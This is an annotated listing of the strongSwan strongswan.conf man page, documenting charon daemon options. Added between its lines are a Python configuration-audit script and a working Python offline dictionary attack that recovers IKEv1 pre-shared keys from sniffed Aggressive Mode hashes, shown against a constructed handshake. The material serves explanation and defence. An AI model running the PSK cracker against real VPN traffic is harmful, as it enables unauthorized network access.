Annotation of embedaddon/strongswan/conf/strongswan.conf.5.main, revision 1.1.1.2

1.1       misho       1: .TP
                      2: .BR aikgen.load " []"
                      3: Plugins to load in the ipsec aikgen tool.
                      4: 
                      5: .TP
                      6: .BR attest.database " []"
                      7: File measurement information database URI. If it contains a password, make sure
                      8: to adjust the permissions of the config file accordingly.
                      9: 
                     10: .TP
                     11: .BR attest.load " []"
                     12: Plugins to load in the ipsec attest tool.
                     13: 
                     14: .TP
                     15: .B charon
                     16: .br
                     17: Options for the charon IKE daemon.
                     18: 
                     19: .RB "" "Note" ":"
                     20: Many of the options in this section also apply to
                     21: .RB "" "charon\-cmd" ""
                     22: and
                     23: other
                     24: .RB "" "charon" ""
                     25: derivatives.  Just use their respective name (e.g.
                     26: .RB "" "charon\-cmd" ""
                     27: instead of
                     28: .RB "" "charon" ")."
                     29: For many options defaults can be defined
                     30: in the
                     31: .RB "" "libstrongswan" ""
                     32: section.
                     33: 
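Because every option in this section is addressed by a dotted path, and because charon.* options take their defaults from the libstrongswan section as noted above, a small audit script makes those lookup rules concrete. The following Python is an added example written for this page, not strongSwan code: it parses the nested `section { key = value }` syntax of strongswan.conf (comments and nesting only, no include statements), resolves a handful of options documented further down with their documented defaults, and flags the settings this page warns about. Both configurations, the accepted boolean spellings and the finding texts are constructed for the example.

```python
"""Audit a strongswan.conf fragment for the options this man page warns about.
Added example, not strongSwan code: the parser handles the nested
"section { key = value }" syntax, '#' comments and blank lines only (no
include statements); both configurations and the rule texts are constructed."""
import re

# Constructed weak configuration.  dos_protection is set only in the
# libstrongswan section, which supplies defaults for charon.* options.
WEAK_CONF = """\
libstrongswan {
    dos_protection = no    # inherited by charon.dos_protection
}
charon {
    accept_unencrypted_mainmode_messages = yes
    i_dont_care_about_security_and_use_aggressive_mode_psk = yes
    plugins {
        attr-sql {
            database = mysql://vpnuser:s3cret@localhost/ipsec
        }
    }
}
"""

# Constructed hardened configuration with the documented defaults made explicit.
HARDENED_CONF = """\
charon {
    accept_unencrypted_mainmode_messages = no
    i_dont_care_about_security_and_use_aggressive_mode_psk = no
    dos_protection = yes
    plugins {
        attr-sql {
            database = sqlite:///etc/ipsec.d/ipsec.db
        }
    }
}
"""

def parse_conf(text):
    """Return nested dicts: sections map to dicts, keys to string values."""
    root = {}
    stack = [root]
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()   # values containing '#' unsupported here
        if not line:
            continue
        if line.endswith("{"):
            stack.append(stack[-1].setdefault(line[:-1].strip(), {}))
        elif line == "}":
            if len(stack) == 1:
                raise ValueError(f"line {lineno}: unbalanced '}}'")
            stack.pop()
        elif "=" in line:
            key, value = (part.strip() for part in line.split("=", 1))
            stack[-1][key] = value
        else:
            raise ValueError(f"line {lineno}: cannot parse {raw!r}")
    if len(stack) != 1:
        raise ValueError("unterminated section")
    return root

def lookup(conf, path):
    """Resolve a dotted option path such as 'charon.plugins.attr-sql.database'."""
    node = conf
    for part in path.split("."):
        if not isinstance(node, dict) or part not in node:
            return None
        node = node[part]
    return node if isinstance(node, str) else None

TRUE_WORDS = {"yes", "true", "enabled", "1"}   # assumed boolean spellings

def get_bool(conf, path, default):
    """charon.* options fall back to libstrongswan.*, then to the documented default."""
    value = lookup(conf, path)
    if value is None and path.startswith("charon."):
        value = lookup(conf, "libstrongswan." + path[len("charon."):])
    return default if value is None else value.lower() in TRUE_WORDS

# (option, documented default, finding when the option ends up enabled / disabled)
RISKY_IF_TRUE = [
    ("charon.accept_unencrypted_mainmode_messages", False,
     "cleartext Main Mode ID/HASH lets a passive attacker brute-force the PSK"),
    ("charon.i_dont_care_about_security_and_use_aggressive_mode_psk", False,
     "Aggressive Mode PSK exposes the PSK hash to offline attacks"),
    ("charon.accept_private_algs", False, "private algorithm IDs accepted from unknown peers"),
    ("charon.force_eap_only_authentication", False, "EAP-only auth forced, violating RFC 5998"),
]
RISKY_IF_FALSE = [("charon.dos_protection", True, "cookie/aggressiveness DoS protection disabled")]
DB_URI_OPTIONS = ["attest.database", "charon.imcv.database", "charon.plugins.attr-sql.database"]
URI_PASSWORD = re.compile(r"://[^/:@\s]+:[^/@\s]+@")

def audit(conf):
    """Return (option, message) pairs for every risky setting found."""
    findings = [(p, m) for p, d, m in RISKY_IF_TRUE if get_bool(conf, p, d)]
    findings += [(p, m) for p, d, m in RISKY_IF_FALSE if not get_bool(conf, p, d)]
    for path in DB_URI_OPTIONS:
        uri = lookup(conf, path)
        if uri and URI_PASSWORD.search(uri):
            findings.append((path, "URI embeds a password; restrict the config file's permissions"))
    return findings
```

Running `audit(parse_conf(WEAK_CONF))` reports the two IKEv1 PSK options, the DoS protection disabled via the libstrongswan fallback, and the password embedded in the attr-sql database URI; the hardened configuration produces no findings. The fallback in `get_bool` is the point of the exercise: a reviewer who only greps the charon section would miss `libstrongswan.dos_protection = no`.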
                     34: .TP
                     35: .BR charon.accept_private_algs " [no]"
                     36: Deliberately violate the IKE standard's requirement and allow the use of private
                     37: algorithm identifiers, even if the peer implementation is unknown.
                     38: 
                     39: .TP
                     40: .BR charon.accept_unencrypted_mainmode_messages " [no]"
                     41: Accept unencrypted ID and HASH payloads in IKEv1 Main Mode.
                     42: 
                     43: Some implementations send the third Main Mode message unencrypted, probably to
                     44: find the PSKs for the specified ID for authentication. This is very similar to
                     45: Aggressive Mode, and has the same security implications: A passive attacker can
                     46: sniff the negotiated Identity, and start brute forcing the PSK using the HASH
                     47: payload.
                     48: 
                     49: It is recommended to keep this option set to no, unless you know exactly what
                     50: the implications are and require compatibility with such devices (for example,
                     51: some SonicWall boxes).
                     52: 
                     53: .TP
                     54: .BR charon.block_threshold " [5]"
                     55: Maximum number of half\-open IKE_SAs for a single peer IP.
                     56: 
                     57: .TP
                     58: .BR charon.cache_crls " [no]"
                     59: Whether Certificate Revocation Lists (CRLs) fetched via HTTP or LDAP should be
                     60: saved under a unique file name derived from the public key of the Certification
                     61: Authority (CA) to
                     62: .RB "" "/etc/ipsec.d/crls" ""
                     63: (stroke) or
                     64: .RB "" "/etc/swanctl/x509crl" ""
                     65: (vici), respectively.
                     66: 
                     67: .TP
                     68: .BR charon.cert_cache " [yes]"
                     69: Whether relations in validated certificate chains should be cached in memory.
                     70: 
                     71: .TP
1.1.1.2 ! misho      72: .BR charon.check_current_path " [no]"
        !            73: By default, after detecting any changes to interfaces and/or addresses no action
        !            74: is taken if the current path to the remote peer still looks usable. Enabling
        !            75: this option will use DPD to check whether the path actually still works (for
        !            76: instance, whether the peer removed its state after a longer period without connectivity).
        !            77: It will also trigger a MOBIKE update if NAT mappings were removed during the
        !            78: downtime.
        !            79: 
        !            80: .TP
        !            81: .BR charon.cisco_flexvpn " [no]"
        !            82: Send the Cisco FlexVPN vendor ID payload, which is required in order to make
        !            83: Cisco brand devices allow negotiating a local traffic selector (from
        !            84: strongSwan's point of view) that is not the assigned virtual IP address if such
        !            85: an address is requested by strongSwan.  Sending the Cisco FlexVPN vendor ID
        !            86: prevents the peer from narrowing the initiator's local traffic selector and
        !            87: allows it to e.g. negotiate a TS of 0.0.0.0/0 == 0.0.0.0/0 instead.  This has
        !            88: been tested with a "tunnel mode ipsec ipv4" Cisco template but should also work
        !            89: for GRE encapsulation.
        !            90: 
        !            91: .TP
1.1       misho      92: .BR charon.cisco_unity " [no]"
                     93: Send Cisco Unity vendor ID payload (IKEv1 only).
                     94: 
                     95: .TP
                     96: .BR charon.close_ike_on_child_failure " [no]"
                     97: Close the IKE_SA if setup of the CHILD_SA along with IKE_AUTH failed.
                     98: 
                     99: .TP
                    100: .BR charon.cookie_threshold " [10]"
                    101: Number of half\-open IKE_SAs that activate the cookie mechanism.
                    102: 
                    103: .TP
                    104: .BR charon.crypto_test.bench " [no]"
                    105: Benchmark crypto algorithms and order them by efficiency.
                    106: 
                    107: .TP
                    108: .BR charon.crypto_test.bench_size " [1024]"
                    109: Buffer size used for crypto benchmark.
                    110: 
                    111: .TP
                    112: .BR charon.crypto_test.bench_time " [50]"
                    113: Time in ms during which crypto algorithm performance is measured.
                    114: 
                    115: .TP
                    116: .BR charon.crypto_test.on_add " [no]"
                    117: Test crypto algorithms during registration (requires test vectors provided by
                    118: the
                    119: .RI "" "test\-vectors" ""
                    120: plugin).
                    121: 
                    122: .TP
                    123: .BR charon.crypto_test.on_create " [no]"
                    124: Test crypto algorithms on each crypto primitive instantiation.
                    125: 
                    126: .TP
                    127: .BR charon.crypto_test.required " [no]"
                    128: Strictly require at least one test vector to enable an algorithm.
                    129: 
                    130: .TP
                    131: .BR charon.crypto_test.rng_true " [no]"
                    132: Whether to test RNG with TRUE quality; requires a lot of entropy.
                    133: 
                    134: .TP
                    135: .BR charon.delete_rekeyed " [no]"
                    136: Delete CHILD_SAs right after they got successfully rekeyed (IKEv1 only). Reduces
                    137: the number of stale CHILD_SAs in scenarios with a lot of rekeyings. However,
                    138: this might cause problems with implementations that continue to use rekeyed SAs
                    139: until they expire.
                    140: 
                    141: .TP
                    142: .BR charon.delete_rekeyed_delay " [5]"
                    143: Delay in seconds until inbound IPsec SAs are deleted after rekeyings (IKEv2
                    144: only). To process delayed packets the inbound part of a CHILD_SA is kept
                    145: installed up to the configured number of seconds after it got replaced during a
                    146: rekeying. If set to 0 the CHILD_SA will be kept installed until it expires (if
                    147: no lifetime is set it will be destroyed immediately).
                    148: 
                    149: .TP
                    150: .BR charon.dh_exponent_ansi_x9_42 " [yes]"
                    151: Use ANSI X9.42 DH exponent size or optimum size matched to cryptographic
                    152: strength.
                    153: 
                    154: .TP
                    155: .BR charon.dlopen_use_rtld_now " [no]"
                    156: Use RTLD_NOW with dlopen when loading plugins and IMV/IMCs to reveal missing
                    157: symbols immediately.
                    158: 
                    159: .TP
                    160: .BR charon.dns1 " []"
                    161: DNS server assigned to peer via configuration payload (CP).
                    162: 
                    163: .TP
                    164: .BR charon.dns2 " []"
                    165: DNS server assigned to peer via configuration payload (CP).
                    166: 
                    167: .TP
                    168: .BR charon.dos_protection " [yes]"
                    169: Enable Denial of Service protection using cookies and aggressiveness checks.
                    170: 
                    171: .TP
                    172: .B charon.filelog
                    173: .br
                    174: Section to define file loggers, see LOGGER CONFIGURATION in
                    175: .RB "" "strongswan.conf" "(5)."
                    176: 
                    177: 
                    178: .TP
                    179: .B charon.filelog.<name>
                    180: .br
                    181: <name> may be the full path to the log file if it only contains characters
                    182: permitted in section names. Is ignored if
                    183: .RI "" "path" ""
                    184: is specified.
                    185: 
                    186: .TP
                    187: .BR charon.filelog.<name>.<subsystem> " [<default>]"
                    188: Loglevel for a specific subsystem.
                    189: 
                    190: .TP
                    191: .BR charon.filelog.<name>.append " [yes]"
                     192: If this option is enabled, log entries are appended to the existing file.
                    193: 
                    194: .TP
                    195: .BR charon.filelog.<name>.default " [1]"
                    196: Specifies the default loglevel to be used for subsystems for which no specific
                    197: loglevel is defined.
                    198: 
                    199: .TP
                    200: .BR charon.filelog.<name>.flush_line " [no]"
                    201: Enabling this option disables block buffering and enables line buffering.
                    202: 
                    203: .TP
                    204: .BR charon.filelog.<name>.ike_name " [no]"
                    205: Prefix each log entry with the connection name and a unique numerical identifier
                    206: for each IKE_SA.
                    207: 
                    208: .TP
1.1.1.2 ! misho     209: .BR charon.filelog.<name>.log_level " [no]"
        !           210: Add the log level of each message after the subsystem (e.g. [IKE2]).
        !           211: 
        !           212: .TP
1.1       misho     213: .BR charon.filelog.<name>.path " []"
                    214: Optional path to the log file. Overrides the section name. Must be used if the
                    215: path contains characters that aren't allowed in section names.
                    216: 
                    217: .TP
                    218: .BR charon.filelog.<name>.time_add_ms " [no]"
                    219: Adds the milliseconds within the current second after the timestamp (separated
                    220: by a dot, so
                    221: .RI "" "time_format" ""
                    222: should end with %S or %T).
                    223: 
                    224: .TP
                    225: .BR charon.filelog.<name>.time_format " []"
                    226: Prefix each log entry with a timestamp. The option accepts a format string as
                    227: passed to
                    228: .RB "" "strftime" "(3)."
                    229: 
                    230: 
                    231: .TP
                    232: .BR charon.flush_auth_cfg " [no]"
                     233: If enabled, objects used during authentication (certificates, identities etc.)
                    234: are released to free memory once an IKE_SA is established. Enabling this might
                    235: conflict with plugins that later need access to e.g. the used certificates.
                    236: 
                    237: .TP
                    238: .BR charon.follow_redirects " [yes]"
                    239: Whether to follow IKEv2 redirects (RFC 5685).
                    240: 
                    241: .TP
1.1.1.2 ! misho     242: .BR charon.force_eap_only_authentication " [no]"
        !           243: Violate RFC 5998 and use EAP\-only authentication even if the peer did not send
        !           244: an EAP_ONLY_AUTHENTICATION notify during IKE_AUTH.
        !           245: 
        !           246: .TP
1.1       misho     247: .BR charon.fragment_size " [1280]"
                    248: Maximum size (complete IP datagram size in bytes) of a sent IKE fragment when
                    249: using proprietary IKEv1 or standardized IKEv2 fragmentation, defaults to 1280
                     250: (use 0 for address family specific default values, which use a lower value for
                     251: IPv4).  If specified, this limit is used for both IPv4 and IPv6.
                    252: 
                    253: .TP
                    254: .BR charon.group " []"
                    255: Name of the group the daemon changes to after startup.
                    256: 
                    257: .TP
                    258: .BR charon.half_open_timeout " [30]"
                    259: Timeout in seconds for connecting IKE_SAs (also see IKE_SA_INIT DROPPING).
                    260: 
                    261: .TP
                    262: .BR charon.hash_and_url " [no]"
                    263: Enable hash and URL support.
                    264: 
                    265: .TP
                    266: .BR charon.host_resolver.max_threads " [3]"
                    267: Maximum number of concurrent resolver threads (they are terminated if unused).
                    268: 
                    269: .TP
                    270: .BR charon.host_resolver.min_threads " [0]"
                    271: Minimum number of resolver threads to keep around.
                    272: 
                    273: .TP
                    274: .BR charon.i_dont_care_about_security_and_use_aggressive_mode_psk " [no]"
                    275: If enabled responders are allowed to use IKEv1 Aggressive Mode with pre\-shared
                    276: keys, which is discouraged due to security concerns (offline attacks on the
                    277: openly transmitted hash of the PSK).
                    278: 
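This option and charon.accept_unencrypted_mainmode_messages above expose the same weakness: the IKEv1 HASH payload is an HMAC keyed with SKEYID, which for pre-shared-key authentication is derived only from the PSK and the two nonces, and every other input to the hash is visible on the wire. The following Python is an added example, not strongSwan code: it implements the RFC 2409 section 5.4 computation of SKEYID, HASH_I and HASH_R and runs the offline dictionary attack the text describes against a constructed handshake (the cookies, nonces, SA body and identities are made up, and the g^x values are filler bytes rather than real Diffie-Hellman public values). It is the same attack tools such as ike-scan's psk-crack mount against Aggressive Mode responders.

```python
"""Offline dictionary attack on the IKEv1 pre-shared-key authentication hash
(RFC 2409 section 5.4), the attack that both Aggressive Mode and a cleartext
third Main Mode message expose.  Added example for this man page, not strongSwan
code; the "captured" handshake below is constructed, not a real trace."""
import hmac

def skeyid_psk(psk, ni_b, nr_b, digest):
    """SKEYID = prf(pre-shared-key, Ni_b | Nr_b), prf being HMAC-<digest>."""
    return hmac.new(psk, ni_b + nr_b, digest).digest()

def auth_hash(psk, cap, role, digest="sha1"):
    """HASH_I = prf(SKEYID, g^xi | g^xr | CKY-I | CKY-R | SAi_b | IDii_b)
       HASH_R = prf(SKEYID, g^xr | g^xi | CKY-R | CKY-I | SAi_b | IDir_b)
    Everything but the PSK crosses the wire unencrypted when these payloads are
    sent in the clear, so an eavesdropper can recompute the hash for each guess."""
    skeyid = skeyid_psk(psk, cap["ni_b"], cap["nr_b"], digest)
    if role == "initiator":
        data = cap["gxi"] + cap["gxr"] + cap["cky_i"] + cap["cky_r"] + cap["sai_b"] + cap["idii_b"]
    else:
        data = cap["gxr"] + cap["gxi"] + cap["cky_r"] + cap["cky_i"] + cap["sai_b"] + cap["idir_b"]
    return hmac.new(skeyid, data, digest).digest()

def crack_psk(cap, observed_hash, role, wordlist, digest="sha1"):
    """Return the wordlist entry that reproduces the sniffed HASH payload, or None."""
    for word in wordlist:
        if hmac.compare_digest(auth_hash(word.encode(), cap, role, digest), observed_hash):
            return word
    return None

def id_payload_body(id_type, data, proto=17, port=500):
    """ID payload body: type (1) | protocol (1) | port (2) | identification data."""
    return bytes([id_type, proto]) + port.to_bytes(2, "big") + data

def make_capture():
    """Constructed values an eavesdropper sees in the clear (not a real trace;
    the g^x values are filler bytes, not real MODP public values)."""
    return {
        "cky_i": bytes.fromhex("0102030405060708"),
        "cky_r": bytes.fromhex("a1a2a3a4a5a6a7a8"),
        "ni_b": bytes.fromhex("11" * 20),
        "nr_b": bytes.fromhex("22" * 20),
        "gxi": bytes(range(128)),
        "gxr": bytes(reversed(range(128))),
        "sai_b": bytes.fromhex("00000001000000010000002800010001"   # constructed SA body
                               "000000200101000080010005800200028003000180040002"),
        "idii_b": id_payload_body(2, b"roadwarrior.example.org"),   # ID_FQDN
        "idir_b": id_payload_body(2, b"gw.example.org"),
    }

REAL_PSK = "Summer2012!"
# Constructed wordlist; a real attack runs a large dictionary or a mask attack.
WORDLIST = ["password", "vpn", "Summer2011!", "Summer2012!", "letmein"]

if __name__ == "__main__":
    cap = make_capture()
    sniffed_hash_r = auth_hash(REAL_PSK.encode(), cap, "responder")  # Aggressive Mode msg 2
    print("recovered PSK:", crack_psk(cap, sniffed_hash_r, "responder", WORDLIST))
```

Each guess costs two HMAC operations and nothing else, which is why a PSK that is merely "not in a wordlist" is not enough once these payloads travel in the clear: the only defences are to keep both options at no, or to use certificate or EAP authentication instead of a group PSK.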
                    279: .TP
                    280: .BR charon.ignore_acquire_ts " [no]"
                     281: If this is disabled, the traffic selectors from the kernel's acquire events,
                     282: which are derived from the triggering packet, are prepended to the traffic
                     283: selectors from the configuration for IKEv2 connections. By enabling this, such
                    284: specific traffic selectors will be ignored and only the ones in the config will
                    285: be sent. This always happens for IKEv1 connections as the protocol only supports
                    286: one set of traffic selectors per CHILD_SA.
                    287: 
                    288: .TP
                    289: .BR charon.ignore_routing_tables " []"
                    290: A space\-separated list of routing tables to be excluded from route lookups.
                    291: 
                    292: .TP
                    293: .BR charon.ikesa_limit " [0]"
                    294: Maximum number of IKE_SAs that can be established at the same time before new
                    295: connection attempts are blocked.
                    296: 
                    297: .TP
                    298: .BR charon.ikesa_table_segments " [1]"
                    299: Number of exclusively locked segments in the hash table.
                    300: 
                    301: .TP
                    302: .BR charon.ikesa_table_size " [1]"
                    303: Size of the IKE_SA hash table.
                    304: 
                    305: .TP
                    306: .B charon.imcv
                    307: .br
                    308: Defaults for options in this section can be configured in the
                    309: .RI "" "libimcv" ""
                    310: section.
                    311: 
                    312: .TP
                    313: .BR charon.imcv.assessment_result " [yes]"
                    314: Whether IMVs send a standard IETF Assessment Result attribute.
                    315: 
                    316: .TP
                    317: .BR charon.imcv.database " []"
                    318: Global IMV policy database URI. If it contains a password, make sure to adjust
                    319: the permissions of the config file accordingly.
                    320: 
                    321: .TP
                    322: .BR charon.imcv.os_info.default_password_enabled " [no]"
                     323: Manually set whether a default password is enabled.
                    324: 
                    325: .TP
                    326: .BR charon.imcv.os_info.name " []"
                    327: Manually set the name of the client OS (e.g. Ubuntu).
                    328: 
                    329: .TP
                    330: .BR charon.imcv.os_info.version " []"
                    331: Manually set the version of the client OS (e.g. 12.04 i686).
                    332: 
                    333: .TP
                    334: .BR charon.imcv.policy_script " [ipsec _imv_policy]"
                    335: Script called for each TNC connection to generate IMV policies.
                    336: 
                    337: .TP
                    338: .BR charon.inactivity_close_ike " [no]"
                     339: Whether to close the IKE_SA if its only CHILD_SA was closed due to inactivity.
                    340: 
                    341: .TP
                    342: .BR charon.init_limit_half_open " [0]"
                    343: Limit new connections based on the current number of half open IKE_SAs, see
                    344: IKE_SA_INIT DROPPING in
                    345: .RB "" "strongswan.conf" "(5)."
                    346: 
                    347: 
                    348: .TP
                    349: .BR charon.init_limit_job_load " [0]"
                    350: Limit new connections based on the number of jobs currently queued for
                    351: processing (see IKE_SA_INIT DROPPING).
                    352: 
                    353: .TP
                    354: .BR charon.initiator_only " [no]"
                     355: Causes the charon daemon to ignore IKE initiation requests.
                    356: 
                    357: .TP
                    358: .BR charon.install_routes " [yes]"
                    359: Install routes into a separate routing table for established IPsec tunnels.
                    360: 
                    361: .TP
                    362: .BR charon.install_virtual_ip " [yes]"
                    363: Install virtual IP addresses.
                    364: 
                    365: .TP
                    366: .BR charon.install_virtual_ip_on " []"
                    367: The name of the interface on which virtual IP addresses should be installed. If
                    368: not specified the addresses will be installed on the outbound interface.
                    369: 
                    370: .TP
                    371: .BR charon.integrity_test " [no]"
                    372: Check daemon, libstrongswan and plugin integrity at startup.
                    373: 
                    374: .TP
                    375: .BR charon.interfaces_ignore " []"
                     376: A comma\-separated list of network interfaces that should be ignored. If
                     377: .RB "" "interfaces_use" ""
                     378: is specified, this option has no effect.
                    379: 
                    380: .TP
                    381: .BR charon.interfaces_use " []"
                    382: A comma\-separated list of network interfaces that should be used by charon. All
                    383: other interfaces are ignored.
                    384: 
                    385: .TP
                    386: .BR charon.keep_alive " [20s]"
                    387: NAT keep alive interval.
                    388: 
                    389: .TP
1.1.1.2 ! misho     390: .BR charon.keep_alive_dpd_margin " [0s]"
        !           391: Number of seconds the keep alive interval may be exceeded before a DPD is sent
        !           392: instead of a NAT keep alive (0 to disable).  This is only useful if a clock is
        !           393: used that includes time spent suspended (e.g. CLOCK_BOOTTIME).
        !           394: 
        !           395: .TP
1.1       misho     396: .BR charon.leak_detective.detailed " [yes]"
                    397: Includes source file names and line numbers in leak detective output.
                    398: 
                    399: .TP
                    400: .BR charon.leak_detective.usage_threshold " [10240]"
                    401: Threshold in bytes for leaks to be reported (0 to report all).
                    402: 
                    403: .TP
                    404: .BR charon.leak_detective.usage_threshold_count " [0]"
                    405: Threshold in number of allocations for leaks to be reported (0 to report all).
                    406: 
                    407: .TP
                    408: .BR charon.load " []"
                    409: Plugins to load in the IKE daemon charon.
                    410: 
                    411: .TP
                    412: .BR charon.load_modular " [no]"
                    413: If enabled, the list of plugins to load is determined via the value of the
                    414: .RI "" "charon.plugins.<name>.load" ""
                    415: options.  In addition to a simple boolean flag that
                    416: option may take an integer value indicating the priority of a plugin, which
                    417: would influence the order of a plugin in the plugin list (the default is 1). If
                    418: two plugins have the same priority their order in the default plugin list is
                    419: preserved. Enabled plugins not found in that list are ordered alphabetically
                    420: before other plugins with the same priority.
                    421: 
                    422: .TP
                    423: .BR charon.make_before_break " [no]"
                    424: Initiate IKEv2 reauthentication with a make\-before\-break instead of a
                    425: break\-before\-make scheme. Make\-before\-break uses overlapping IKE and CHILD_SA
                    426: during reauthentication by first recreating all new SAs before deleting the old
                    427: ones. This behavior can be beneficial to avoid connectivity gaps during
                    428: reauthentication, but requires support for overlapping SAs by the peer.
                    429: strongSwan can handle such overlapping SAs since version 5.3.0.
                    430: 
                    431: .TP
                    432: .BR charon.max_ikev1_exchanges " [3]"
                    433: Maximum number of IKEv1 phase 2 exchanges per IKE_SA to keep state about and
                    434: track concurrently.
                    435: 
                    436: .TP
                    437: .BR charon.max_packet " [10000]"
                    438: Maximum packet size accepted by charon.
                    439: 
                    440: .TP
                    441: .BR charon.multiple_authentication " [yes]"
                    442: Enable multiple authentication exchanges (RFC 4739).
                    443: 
                    444: .TP
                    445: .BR charon.nbns1 " []"
                     446: WINS server assigned to peer via configuration payload (CP).
                    447: 
                    448: .TP
                    449: .BR charon.nbns2 " []"
                     450: WINS server assigned to peer via configuration payload (CP).
                    451: 
                    452: .TP
                    453: .BR charon.plugin.ha.buflen " [2048]"
                    454: Buffer size for received HA messages. For IKEv1 the public DH factors are also
                    455: transmitted so depending on the DH group the HA messages can get quite big (the
                    456: default should be fine up to
                    457: .RI "" "modp4096" ")."
                    458: 
                    459: 
                    460: .TP
                    461: .BR charon.plugins.addrblock.strict " [yes]"
                    462: If set to yes, a subject certificate without an addrblock extension is rejected
                    463: if the issuer certificate has such an addrblock extension. If set to no, subject
                    464: certificates issued without the addrblock extension are accepted without any
                    465: traffic selector checks and no policy is enforced by the plugin.
                    466: 
                    467: .TP
                    468: .BR charon.plugins.android_log.loglevel " [1]"
                    469: Loglevel for logging to Android specific logger.
                    470: 
                    471: .TP
                    472: .B charon.plugins.attr
                    473: .br
                    474: Section to specify arbitrary attributes that are assigned to a peer via
                    475: configuration payload (CP).
                    476: 
                    477: .TP
                    478: .BR charon.plugins.attr.<attr> " []"
                    479: .RB "" "<attr>" ""
                    480: can be either
                    481: .RI "" "address" ","
                    482: .RI "" "netmask" ","
                    483: .RI "" "dns" ","
                    484: .RI "" "nbns" ","
                    485: .RI "" "dhcp" ","
                    486: .RI "" "subnet" ","
                    487: .RI "" "split\-include" ","
                    488: .RI "" "split\-exclude" ""
                    489: or the numeric identifier of the attribute
                    490: type. The assigned value can be an IPv4/IPv6 address, a subnet in CIDR notation
                    491: or an arbitrary value depending on the attribute type.  For some attribute types
                    492: multiple values may be specified as a comma separated list.
                    493: 
                    494: .TP
                    495: .BR charon.plugins.attr-sql.crash_recovery " [yes]"
                    496: Release all online leases during startup.  Disable this to share the DB between
                    497: multiple VPN gateways.
                    498: 
                    499: .TP
                    500: .BR charon.plugins.attr-sql.database " []"
                    501: Database URI for attr\-sql plugin used by charon. If it contains a password, make
                    502: sure to adjust the permissions of the config file accordingly.
                    503: 
                    504: .TP
                    505: .BR charon.plugins.attr-sql.lease_history " [yes]"
                    506: Enable logging of SQL IP pool leases.
                    507: 
                    508: .TP
                    509: .BR charon.plugins.bliss.use_bliss_b " [yes]"
                    510: Use the enhanced BLISS\-B key generation and signature algorithm.
                    511: 
                    512: .TP
1.1.1.2 ! misho     513: .BR charon.plugins.botan.internal_rng_only " [no]"
        !           514: If enabled, only Botan's internal RNG will be used throughout the plugin.
        !           515: Otherwise, and if supported by Botan, rng_t implementations provided by other
        !           516: loaded plugins will be used as RNG.
        !           517: 
        !           518: .TP
1.1       misho     519: .BR charon.plugins.bypass-lan.interfaces_ignore " []"
                     520: A comma\-separated list of network interfaces for which connected subnets should
                     521: be ignored. If
                     522: .RB "" "interfaces_use" ""
                     523: is specified, this option has no effect.
                    524: 
                    525: .TP
                    526: .BR charon.plugins.bypass-lan.interfaces_use " []"
                    527: A comma\-separated list of network interfaces for which connected subnets should
                    528: be considered. All other interfaces are ignored.
                    529: 
                    530: .TP
                    531: .BR charon.plugins.certexpire.csv.cron " []"
                    532: Cron style string specifying CSV export times.
                    533: 
                    534: .TP
                    535: .BR charon.plugins.certexpire.csv.empty_string " []"
                    536: String to use in empty intermediate CA fields.
                    537: 
                    538: .TP
                    539: .BR charon.plugins.certexpire.csv.fixed_fields " [yes]"
                    540: Use a fixed intermediate CA field count.
                    541: 
                    542: .TP
                    543: .BR charon.plugins.certexpire.csv.force " [yes]"
                    544: Force export of all trustchains we have a private key for.
                    545: 
                    546: .TP
                    547: .BR charon.plugins.certexpire.csv.format " [%d:%m:%Y]"
                    548: .RB "" "strftime" "(3)"
                    549: format string to export expiration dates as.
                    550: 
                    551: .TP
                    552: .BR charon.plugins.certexpire.csv.local " []"
                    553: .RB "" "strftime" "(3)"
                    554: format string for the CSV file name to export local certificates
                    555: to.
                    556: 
                    557: .TP
                    558: .BR charon.plugins.certexpire.csv.remote " []"
                    559: .RB "" "strftime" "(3)"
                    560: format string for the CSV file name to export remote
                    561: certificates to.
                    562: 
                    563: .TP
                    564: .BR charon.plugins.certexpire.csv.separator " [,]"
                    565: CSV field separator.
                    566: 
                    567: .TP
                    568: .BR charon.plugins.coupling.file " []"
                    569: File to store coupling list to.
                    570: 
                    571: .TP
                    572: .BR charon.plugins.coupling.hash " [sha1]"
                    573: Hashing algorithm to fingerprint coupled certificates.
                    574: 
                    575: .TP
                    576: .BR charon.plugins.coupling.max " [1]"
                    577: Maximum number of coupling entries to create.
                    578: 
                    579: .TP
                    580: .BR charon.plugins.curl.redir " [-1]"
                    581: Maximum number of redirects followed by the plugin, set to 0 to disable
                    582: following redirects, set to \-1 for no limit.
                    583: 
                    584: .TP
                    585: .BR charon.plugins.dhcp.force_server_address " [no]"
                    586: Always use the configured server address. This might be helpful if the DHCP
                    587: server runs on the same host as strongSwan, and the DHCP daemon does not listen
                    588: on the loopback interface.  In that case the server cannot be reached via
                    589: unicast (or even 255.255.255.255) as that would be routed via loopback. Setting
                    590: this option to yes and configuring the local broadcast address (e.g.
                    591: 192.168.0.255) as server address might work.
                    592: 
                    593: .TP
                    594: .BR charon.plugins.dhcp.identity_lease " [no]"
                    595: Derive user\-defined MAC address from hash of IKE identity and send client
                    596: identity DHCP option.
                    597: 
                    598: .TP
                    599: .BR charon.plugins.dhcp.interface " []"
                    600: Interface name the plugin uses for address allocation. The default is to bind to
                    601: any (0.0.0.0) and let the system decide which way to route the packets to the
                    602: DHCP server.
                    603: 
                    604: .TP
                    605: .BR charon.plugins.dhcp.server " [255.255.255.255]"
                    606: DHCP server unicast or broadcast IP address.
                    607: 
                    608: .TP
                    609: .BR charon.plugins.dhcp.use_server_port " [no]"
                    610: Use the DHCP server port (67) as source port, instead of the DHCP client port
                    611: (68), when a unicast server address is configured and the plugin acts as relay
                    612: agent.  When replying in this mode the DHCP server will always send packets to
                    613: the DHCP server port and if no process binds that port an ICMP port unreachable
                    614: will be sent back, which might be problematic for some DHCP servers.  To avoid
                    615: that, enabling this option will cause the plugin to bind the DHCP server port to
                    616: send its requests when acting as relay agent. This is not necessary if a DHCP
                    617: server is already running on the same host and might even cause conflicts (and
                    618: since the server port is already bound, ICMPs should not be an issue).
                    619: 
                    620: .TP
                    621: .BR charon.plugins.dnscert.enable " [no]"
                    622: Enable fetching of CERT RRs via DNS.
                    623: 
                    624: .TP
                    625: .BR charon.plugins.drbg.max_drbg_requests " [4294967294]"
                    626: Number of pseudo\-random bit requests from the DRBG before an automatic reseeding
                    627: occurs.
                    628: 
                    629: .TP
                    630: .BR charon.plugins.duplicheck.enable " [yes]"
                    631: Enable duplicheck plugin (if loaded).
                    632: 
                    633: .TP
                    634: .BR charon.plugins.duplicheck.socket " [unix://${piddir}/charon.dck]"
